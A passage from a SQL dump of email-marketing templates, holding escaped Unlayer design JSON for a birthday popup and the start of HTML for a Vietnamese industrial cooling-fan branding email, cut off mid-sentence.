22px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#ffffff\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderLeftColor\\\":\\\"#ffffff\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"2px\\\",\\\"borderRightColor\\\":\\\"#ffffff\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"2px\\\",\\\"borderBottomColor\\\":\\\"#ffffff\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"2px\\\"},\\\"borderRadius\\\":\\\"10px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 24px; line-height: 28.8px;\\\\\\\">PICK YOUR GIFT NOW!<\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":300,\\\"calculatedHeight\\\":54}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"columnsBackgroundColor\\\":\\\"#b5e0ff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"bmVvsx1x_O\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"LkxxyquO6k\\\",\\\"contents\\\":[{\\\"id\\\":\\\"a87M8icBKZ\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 20px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#9c9c9c\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">We hope you have the happiest of birthdays!<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">&nbsp;<\\/p>\\\\n<p style=\\\\\\\"line-height: 160%; font-size: 14px;\\\\\\\">Here&rsquo;s to you,<\\/p>\\\\n<p style=\\\\\\\"line-height: 160%; font-size: 14px;\\\\\\\">The Your Company&nbsp;Team<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Yt5Su6IwyL\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"cvGHS2uQ4y\\\",\\\"contents\\\":[{\\\"id\\\":\\\"OwmtNlvPMQ\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\"><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">You received this email because you signed up for My Company Inc.<\\/span><\\/div>\\\\n<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\">&nbsp;<\\/div>\\\\n<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\"><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">Unsubscribe<\\/span><\\/div>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f0f0f0\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":false,\\\"cover\\\":false},\\\"padding\\\":\\\"30px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Raleway\\\",\\\"value\\\":\\\"\'Raleway\',sans-serif\\\",\\\"type\\\":\\\"google\\\",\\\"weights\\\":\\\"400,700\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":true},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":9}\"', '', 0, '2022-08-29 11:54:08');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(7, 'Branding', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #5f5f8d; text-decoration: none; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Raleway:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #fbfbfb;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #fbfbfb;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #fbfbfb;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:22px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1676879143752-LOGO-HA.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 49%;max-width: 284.2px;\\\" width=\\\"284.2\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #236fa1;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1676879443906-1250.jpg\');background-repeat: no-repeat;background-position: center center;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1676879443906-1250.jpg\');background-repeat: no-repeat;background-position: center center;background-color: #236fa1;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:44px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Raleway\',sans-serif; font-size: 60px; font-weight: 700; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">THI\\u1ebeT K\\u1ebe - T\\u01af V\\u1ea4N - CUNG C\\u1ea4P<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\">GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:35px 44px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #34495e; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 22px; line-height: 30.8px;\\\">Dear Name,<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h1 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 22px; \\\">THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/h1>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 17px; \\\"><strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG C\\u00d4NG NGHI\\u1ec6P<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Trong m\\u00f4i tr\\u01b0\\u1eddng c\\u00f4ng nghi\\u1ec7p, vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng gi\\u00f3 kh\\u00f4ng kh\\u00ed \\u0111\\u1ea3m b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 ch\\u00eanh l\\u1ec7ch t\\u1eeb 3-60C v\\u1edbi kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m. Ch\\u1ec9 c\\u00f3 qu\\u1ea1t tr\\u1ea7n, qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p HVLS s\\u1ebd ph\\u00f9 cho b\\u1ea5t c\\u1ee9 kh\\u00f4ng gian r\\u1ed9ng l\\u1edbn n\\u00e0o v\\u1edbi hi\\u1ec7u su\\u1ea5t l\\u00e0m m\\u00e1t tuy\\u1ec7t v\\u1eddi, ki\\u1ec3m so\\u00e1t kh\\u00f4ng kh\\u00ed th\\u1ed5i s\\u00e0n \\u0111\\u01b0a lu\\u1ed3ng kh\\u00ed \\u0111\\u1ebfn nh\\u1eefng n\\u01a1i c\\u1ea7n thi\\u1ebft.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 17px; \\\"><strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG V\\u0102N PH\\u00d2NG - TT TH\\u01af\\u01a0NG M\\u1ea0I<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Cho d\\u00f9 to\\u00e0 nh\\u00e0 v\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c cho \\u0111\\u1ebfn trung t\\u00e2m th\\u01b0\\u01a1ng m\\u1ea1i. H\\u1ec7 th\\u1ed1ng qu\\u1ea1t l\\u00e0m m\\u00e1t kh\\u00f4ng gian Commercial s\\u1ebd gi\\u00fap b\\u1ea1n chi ph\\u00ed ti\\u1ec1n 